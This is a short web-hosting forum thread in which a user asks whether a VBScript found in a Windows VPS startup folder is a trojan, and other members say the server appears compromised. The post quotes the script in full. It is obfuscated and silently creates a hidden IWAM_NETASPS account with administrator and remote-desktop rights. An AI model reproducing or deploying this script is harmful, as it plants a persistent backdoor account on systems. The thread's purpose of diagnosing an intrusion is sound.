IWAM_NETASPS user changed using startup script

**anilsaxena** · 06-10-2011, 08:54 PM

On our windows VPS, there is one script asps.vbs created in All Users/Start Up folder with following content:

Code:

set wshshell=createobject ("wsc"&"ript.shell" ) 
a=wshshell.run ("cmd.exe /c n"&"et u"&"ser IWAM_N"&"ETASPS df;t"&"some_value/a"&"dd",0) 
b=wshshell.run ("cmd.exe /c n"&"et loca"&"lgroup Admin"&"istrators IWAM_"&"NETASPS /a"&"dd",0) 
c=wshshell.run ("cmd.exe /c net localgroup ""Remote Desktop Users"" IWAM_NETASPS /add",0)

Is this reguler file or some kind of trojan ?

**JPC-Zishan** · 06-14-2011, 08:15 AM

This is not a regular file. This script is creating a new user IWAM_NETASPS with Administrator & Remote Access privilege. VPS appears to have been exploited. I would suggest scanning the file system for any trojans/viruses. You can also search registry for this script name or do a search on VPS to see in which folders this VB script is present.

**anilsaxena** · 06-14-2011, 09:09 AM

Thanks for the explanation, can you please suggest some scanner to find torjons / viruses?

**nayan007** · 11-17-2011, 11:31 AM

Hi,

I would like to suggest you to use Norman Malware/Trojon cleaner.It is free cleaner.

LinkBack

Thread Tools

Display

IWAM_NETASPS user changed using startup script

Bookmarks

Bookmarks

Posting Permissions